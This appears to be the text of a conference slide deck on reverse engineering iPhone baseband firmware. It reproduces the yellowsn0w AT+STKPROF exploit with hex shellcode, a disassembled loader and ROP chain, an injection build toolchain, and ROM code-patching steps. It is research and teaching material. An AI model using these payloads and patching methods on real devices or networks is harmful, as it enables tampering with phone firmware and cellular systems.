  • 24. AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 <- stage2 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
  • 25. AT+STKPROF   at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf 9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8 905120000000001010101020202020611301000c000000";"x10x32x0Fx27 xBAx43x17x1Cx0ExA4x0BxA5x01x35x21x78x78x29x0CxD0 xA8x47x0Bx01x61x78xA8x47xC0x46xC0x46xC0x46xC0x46 xC9x18x11x70x02x34x01x32xEFxE7xC0x46xC0x46x01x37 x38x47x30x30x41x29x01xDA09pG79pG024803A1013101601FBD0000 <- payload 4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047 071CC56080204000A047802214495200144B041C9847099B0193442303930A23 013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1 0B4908980B4B984703E00B490898094B98470BB0F0BD000044B33B40AC201420 641A0100A0583C20481A010040B53F20541A010000DD4620581A010064657674 65616D31000000004F4B21004552524F522025640000000030B5114D85B0114B 281C6946FF229847009B0D2B11D101990D4B0A681A6004334A681A608A680B4B 13600B4B53600B4B93600123CB6020230093281C6946FF22074B9847DFE70000 5427234098591620BC792F4000FF0001010402040304040468D53E20xx”
  • 26. Loader   RAM:00011360 loader RAM:00011360 LDR R2, =0x11700 ; unused ram to place code RAM:00011362 ADDS R4, R2, #1 ; thumb switch RAM:00011364 LDR R3, =0x40159FBF ; location of stage2+payload in mem RAM:00011366 copy_loop RAM:00011366 LDRB R0, [R3] ; copy till quotes RAM:00011368 CMP R0, #0x22 RAM:0001136A BEQ run RAM:0001136C STRB R0, [R2] RAM:0001136E ADDS R2, #1 RAM:00011370 ADDS R3, #1 RAM:00011372 B copy_loop RAM:00011374 run RAM:00011374 BX R4 ; stage2 RAM:00011376 DCW 0 RAM:00011378 dword_11378 DCD 0x40159FBF RAM:0001137C dword_1137C DCD 0x11700 Original disasm on iPhone wiki
  • 27. Loader   •  Loader  is  a  standard  copy  loop   •  Dwords  following  loader  are  interes4ng:   RAM:00011380 DCD 0x40566E54 RAM:00011384 DCD 0x20 RAM:00011388 DCD 0x1135C ; R4 used in bytecopy RAM:0001138C DCD 0x40566E26 ; R5 used in bytecopy, has loader code RAM:00011390 DCD 0xDDDDDDDD ; padding RAM:00011394 DCD 0xEEEEEEEE ; padding RAM:00011398 DCD 0x205190B8 ; <- ys_bytecode_rop(R4 + 4, R5 + 0x12, 0x50) RAM:0001139C DCD 0 ; padding RAM:000113A0 DCD 0x10101010 ; padding RAM:000113A4 DCD 0x20202020 ; padding RAM:000113A8 DCD 0x11361 ; return into loader code (0x11360+Thumb) RAM:000113AC DCD 0xC  
  • 28. Loader   •  When  entering  the  following  code  snippet,   •  R4  =  0x1135C  and  R5  =  0x40566E26,     ROM:205190B8 ADD R1, R5, #0x12 ; R1 = 0x40566E26 + 0x12 = 0x40566E38 ROM:205190BC ADD R0, R4, #4 ; R0 = 0x1135C + 4 = 0x11360 ROM:205190C0 BL bytecpy ROM:205190C4 LDMFD SP!, {R4-R6,PC} Performs  bytecpy(0x11360,  0x40566E38,  R2)   R2  happens  to  be  0x50  
  • 29. Loader   •  Loader  is  a  standard  copy  loop   •  Dwords  following  loader  are  interes4ng:   RAM:00011380 DCD 0x40566E54 RAM:00011384 DCD 0x20 RAM:00011388 DCD 0x1135C ; R4 used in bytecopy RAM:0001138C DCD 0x40566E26 ; R5 used in bytecopy, has loader code RAM:00011390 DCD 0xDDDDDDDD ; padding RAM:00011394 DCD 0xEEEEEEEE ; padding RAM:00011398 DCD 0x205190B8 ; <- ys_bytecode_rop(R4 + 4, R5 + 0x12, 0x50) RAM:0001139C DCD 0 ; padding RAM:000113A0 DCD 0x10101010 ; padding RAM:000113A4 DCD 0x20202020 ; padding RAM:000113A8 DCD 0x11361 ; return into loader code (0x11360+Thumb) RAM:000113AC DCD 0xC  
  • 30. Stage2   •  Stage2  decodes,  aka  unhexlify(),  the  payload   and  jumps  into  it.   •  Can  be  viewed  on  iPhone  Wiki.   •  Note:  payload  loading  address  is  based  on  size   of  payload.   •  This  is  fixed  in  ultrasn0w  
  • 31. Payload   Payload  consists  of  three  func4ons   •  handler_replace()  –  changes  sot  reset  handler   ptr  to  new_handler   •  new_handler()  –  creates  a  new  task  using   NU_Create_Task()   •  task_loop()  –  sends  a  message  to  the  Security   Mailbox  (IPC)  
  • 32. Payload   •  The  new_handler()  func4on  is  ideal  for   modifica4on.   •  It  will  be  called  during  sot  reset  
  • 33. Disassembly  4ps   •  ARM  must  be  4  byte  aligned,  Thumb  2  byte   aligned   •  If  disasm  not  aligning,  make  3  copies  with   extra  character  in  front:   x06x4ax54x1cx04x4bx18… Ax06x4ax54x1cx04x4bx18… AAx06x4ax54x1cx04x4bx18… AAAx06x4ax54x1cx04x4bx18… •  See  which  makes  best  code   –  Try  both  ARM  and  Thumb  mode  (ALT-­‐G)  
  • 34. Disassembly  Tips   •  Make  segments  for  loader,  stage2,  etc   –  Load  Addi%onal  Binary  File  with  different  offsets   –  Or  make  manual  segments  and  copy  bytes   •  Use  IDA  and  QEMU  to  run  code  snippets   –  Works  great  for  tes4ng  custom  injected  code  later   on.              hAp://www.hexblog.com/?p=111  
  • 36. Choosing  a  Baseband  Version   •  We  need  an  unlockable  version   –  Generally  can’t  downgrade   •  This  talk  is  using  an  old  version  02.28.00   –  Started  ater  yellowsn0w  release,  stopped   working  on  this,  and  recently  restarted   –  Test  phone  was  never  upgraded   –  Techniques  applicable  to  other  versions  
  • 37. Extrac4ng  Baseband  Image   •  iPhone  firmware  comes  in  ipsw  (aka  zip)  files.     •  Baseband  firmware  is  in  the  “restore”  dmg   •  The  restore  image  needs  to  be  decrypted   using  img3decrypt  or  xpwntool   •  Keys  are  listed  on  iPhone  wiki   •  Path  is  usr/local/standalone/firmware/   •  File  extension  is  .fls,  ex:  ICE2_04.26.08.fls  
  • 38. IDA  Pro   •  iPhone  wiki  has  loading  instruc4ons                hAp://theiphonewiki.com/wiki/index.php?4tle=IDA_Pro_Setup   •  Unfortunately  IDA  Pro  doesn’t  find  very  many   func4ons.   •  The  baseband  has  both  ARM  and  Thumb  code.   •  ALT-­‐G  changes  the  CPU  mode.  0  =  ARM,  1  =   Thumb  
  • 39. IDA  Pro   •  A  script  is  needed  to  find  common  prologues   (ARM  and  Thumb)   •  Script  should   –  Change  mode  if  needed   –  Create  code   –  Create  a  func4on  
  • 40. IDA  Pro   •  Original  disassembly  has  3440  func4ons     •  Ater  running  the  script,  disassembly  has   33284  func4ons    
  • 41. IDA  Pro   •  The  script  isn’t  perfect.   •  Lots  of  fixups  s4ll  needed   •  itsme  idc  scripts  are  useful  for  data   –  Table(“od”);  //  creates  offset,  data   •  Many  strings  aren’t  defined   –  itsme  script  assumes  4  byte  aligned  strings   •  Remember  Thumb  func4on  pointer  are   address  +  1  
  • 42. IDA  Pro   •  Start  using  known  func4on  address  from   exploit  disasm,  ex  NU_Create_Task   •  Locate  nucleus  library  files,  preferably  ARM   –  I  believe  there  is  now  a  downloadable  demo   •  Bindiff  can  be  used   •  Look  for  specific  constants  used  as   immediates  in  IDA   –  TASK  is  0x5441534B   –  HISR  is  0x48495352  
  • 43. Some  Interes4ng  Strings   ROM:20623462 fbi_bits ROM:204B33D4 I don't like you. Go 'way. ROM:203315B7 I2S1 Bluetooth ROM:204BE8AC heap internal error ( memory overwriting? ) ROM:20109794 IMEI check failed for IMEI[%d]=%cn ROM:20547DF4 Not implemented functionality. ROM:203AA51C WARNING: NMEA buffer %s is too small %d<100n ROM:20412E60 UMTS Serving Cell: ROM:204546BC GPS~ E911 Agps Allowed Time set to %d s.n ROM:205133A0 ../../umts/design/ue-rrc/text/urrcm_l3_handle_cells.c
  • 44.
  • 46. Development  Environment   Need  to  :   1.  Compile  our  assembly  code   2.  Strip  out  the  essen4al  code  and  do  reloc   fixups   3.  Package  code  in  proper  format  for  exploit  
  • 47. Compiler   •  Using  Code  Sourcery  Lite  under  Linux   –  Code  Sourcery  runs  under  Windows  as  well   –  X  Code  will  compile  (mach-­‐o  vs.  ELF  object  files)   hAp://www.codesourcery.com/sgpp/lite/arm/portal/release1802   •  The  tar  version  works    
  • 48. Makefile   CROSS_COMPILE=~/arm-2011.03/bin/arm-none-eabi- CC=${CROSS_COMPILE}gcc CFLAGS=-mcpu=arm926ej-s CFLAGS+=-mthumb all: asm.o @echo "[*] building payload.bin" @python build_payload.py ys asm.o @echo "[*] done." asm.o: asm.s @echo "[*] compiling asm.s => asm.o" @$ $(CC) $(CFLAGS) -c asm.s clean: rm -f *.o *~ *.bin
  • 49. Build  script   •  A  python  script  is  called  during  the  build   –  Finds  .text  sec4on   –  Gets  raw  code   –  Performs  reloca4on  fixes   •  Must  know  loading  address,  exploit  specific   –  Packages  payload  in  usable  exploit  format  
  • 50. Build  script   Usage: build_payload.py [options] payload_type objectfile.o Required args: payload_type - type of payload, valid types: ys - yellowsn0w ysr - yellowsn0w raw idt - injection dev tool (must set a base address, '-b') objectfile.o - file to strip payload_type from Options: --version show program's version number and exit -h, --help show this help message and exit -b BASE_ADDR, --base_addr=BASE_ADDR base address (idt payload_type only) -a, --arm_entry starting addr is arm, default is Thumb -q, --quiet
  • 51. Code  injec4on   •  Modified  version  of  yellowsn0w  reads  in   payload.bin  file.   •  The  file  contains  the  AT+STKPROF  command   •  Used  in  single  shot  mode  
  • 52. Sample  assembly     .text /* .datas */ .align 2 .align 4 .code 16 jumptable_addr: _new_handler: .long 0x403BB344 push {r4-r7,lr} sprintf: ldr r3, jumptable_addr .long 0x2046DD00 strh r0, [r3] ptr_my_response: mov r0, r1 .long my_response ldr r1, ptr_my_response my_response: ldr r3, sprintf .ascii "y0h! all up in ur blx r3 basebands!!!0” pop {r4-r7,pc}
  • 53. Sample  C   #define BYTECPY(x) void* (* x)(void*, void*, unsigned int) #define BYTECPY_ADDR (void* (*)(void*, void*, unsigned int)) 0x203C58A0 int test(void) { void* dest = (void*)0x11300; void* src = (void*)0x2026B0F8; BYTECPY(my_bytecpy) = BYTECPY_ADDR; my_bytecpy(dest,src,4); return 0; }
  • 54. Debugging   •  No  interac4ve  debugging   •  Crash  excep4on  if  we  are  lucky     1.  Call  the  magic  number,  *#5005*78283#   2.  Reply   3.  Pick  a  descrip4on   4.  Look  in  /var/logs/CrashReporter/Baseband
  • 55.
  • 56.
  • 57.
  • 58. Crash  dump  (cleaned  up)   +XLOG: Exception Number: 1 Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP) System Stack: [ snip ] 0x2030A740 0x20402049 0x20407ABD 0x2026D300 0x202CB7A3 Date: 10.09.2011 Time: 03:59:15 Register: r0: 0x0000000C r1: 0x1C544A06 r2: 0x00000050 r3: 0x20512A51 r4: 0x5F04044A r5: 0x5F05054A r6: 0x5F06064A r7: 0x5F07074A r8: 0x00000000 r9: 0x00000000 r10: 0x40565AA8 r11: 0x4056BAA8 r12: 0x45564E54 r13: 0x40566E98 r14: 0x20512A57 r15: 0x5F080848 SPSR: 0x00000013 DFAR: 0xFFFFCFFF DFSR: 0x00000005 OK
  • 60. Debugging   •  As  can  be  seen,  Debugging  is  preAy  caveman   •  Once  we  can  modify  code,  excep4ons  could   be  forced  (invalid  instruc4on)  and  registers   inspected.   •  Ideally  could  patch  vector  table  in  high   memory  and  make  our  own  excep4on   handler.  
  • 62. Dynamic  Reversing   •  The  first  thing  we  should  do  is  dump  memory.   •  I  found  a  memory  dump  of  02.28.00  online   which  appears  to  be  gone.   •  Within  the  dump  I  found  code  to  a  very  useful   tool.   •  I  don’t  know  who  wrote  it,  but  thanks  :)  
  • 63. Dynamic  Reversing   •  I  refer  to  the  tool  as  IDT,  injec4on   development  tool.   •  The  usage  is:   usage: at@reset(cmd,addr,size,{byte array}) cmd: 1-read,2-write,3-call •  I  packaged  the  tool  into  a  AT+STKPROF   payload  
  • 64. Dynamic  Reversing   •  Memory  can  now  be  dumped   •  Memory  map  courtesy  of  iPhone  wiki:  
  • 65. Dynamic  Reversing   •  Interes4ng  memory  is  in  low  memory,  RAM,   and  high  memory   •  The  goal  is  to  add  these  into  IDA   –  Keep  in  mind  that  RAM  is  just  a  snapshot  in  4me    
  • 66. Combining  dumps  into  IDA   This  example  loads  a  file  dump_FFFF0000_10000.bin   1.  File  -­‐>  LoadFile  -­‐>  Addi4onal  Binary  File   2.  Presented  with  a  menu  (changed  the  following)      Loading  segment:  0xffff000    //  paragraphs  aka  /0x10      Number  of  bytes:    0xfffc      //  cant  have  address  wrap  to  0   3.  Change  selectors      This  makes  displayed  addresses  appear  correctly      View  -­‐>  Open  Subviews  -­‐>  Selectors      Change  values  to  zero  
  • 67. Exploring  memory   •  One  of  the  original  yellowsn0w  demos  was  a  ps   lis4ng  of  running  tasks.   •  I  implemented  this  in  idapython  in  the  combined   idb.   •  Simple  code  ater  learning  the  NU_TASK   structure   •  NU_TASK  includes  process  name  and  address  for   entry  func4on     •  Script  renames  entry  func4on  using  process   name  
  • 68. Exploring  Memory   [+] Collecting NU_TASKs 0x205675b9 dll:1[35] 0x205675b9 dll:2[35] 0x20594189 rrc:1[55] 0x202cb1c5 atc:1[85] 0x205b5ddd xdr:1[50] 0x2056a8c9 gps:1[90] 0x204d8a15 mon[120] 0x204043dd ata[84] 0x204429a9 io_evt[60] 0x202fcd2c sec[69] 0x202c8f4c xdrv_dat[150] 0x203e5e1c DMA[255] NOTE: select set of tasks for display
  • 69. Exploring  Memory     •  Similar  things  can  be  done  with  other   resources   –  HISR   –  Semaphores   –  Etc.  
  • 70. Exploring  Memory   •  This  is  a  rough  overview  of  what  is  found  in   memory     Address   Contents   0x0000-0xFFFF TLB,  RAM,  code   0x40000000-0x407fffff RAM,  Global  Variables,  General  RAM   0xffff0000-0xffffffff Vector  Table,  API  func4ons,  pointers  
  • 72. Patching  Code   •  Up  to  this  point  only  have  been  able  to  run   code  that  uses  provided  APIs   •  Ideally  we  want  to  modify  exis4ng  code.   •  The  code  we  want  to  modify  is  in  ROM  (flash).   •  purplesn0w  uses  code  patching  to  perform  its   unlock      source code: http://apt.geohot.com/purplesn0w_source.zip
  • 73. Patching  Code   1.  Disable  interrupts   2.  Copy  the  page   3.  Patch  it   4.  MMU  disable   5.  Write  to  TLB   6.  Invalidate  TLB   7.  MMU  enable   8.  Flush  instruc4on  cache   9.  Enable  interrupts  
  • 74. Patching  Code   /* PATCHES here: */ LDR R0, =0x4306B0F8 STR R1, [R0] ADD R0, R0, #4 LDR R1, =0x646c6f6c STR R2, [R0] LDR R2, =0x7a676e30 ADD R0, R0, #4 LDR R3, =0x7265765f STR R3, [R0] LDR R4, =0x6e6f6973 ADD R0, R0, #4 LDR R5, =0x7325203a STR R4, [R0] MOV R6, #0 ADD R0, R0, #4 STR R5, [R0] ADD R0, R0, #4 STR R6, [R0] /* **************************** */
  • 75. Patching  Code   Original: Patched: at+xgendata at+xgendata +XGENDATA: " +XGENDATA: " "ICE2_MODEM_02.28.00", "ICE2_MODEM_02.28.00", "EEP_VERSION:526", "EEP_VERSION:526", "EEP_REVISION:0", "EEP_REVISION:0", “BOOTLOADER_VERSION: 5.9_M3S2", 1,0 "lold0ngz_version: 5.9_M3S2",1,0 OK OK NOTE: edited and trimmed for display purposes
  • 76. Patching  Code   •  At  this  point,  we  can  add  hooking  code.   •  Can  add  debugging  logging  removed  in  release   build   •  Can  modify  the  vector  table  in  high  memory   and  write  our  own  excep4on  handler,  aka  our   own  debugger    
  • 77. Patching  Code   •  Many  interes4ng  areas  of  code  to  modify   •  The  main  Tasks  are  good  star4ng  points.   •  The  GSM  and  UMTS  code  has  many  strings,   making  iden4fica4on  easy   •  Appear  to  be  internal  tes4ng  tools  and   scrip4ng  in  firmware.   •  Should  only  be  done  on  a  test  network   •  Check  with  any  laws  in  your  area  
  • 79. Conclusion   •  Baseband  is  just  another  embedded  system.   •  Using  unlocks  allows  for  run4me  access.   •   Combining  run4me  access  with  a   development  environment  and  exis4ng  RE   methods  allows  for  easy  explora4on.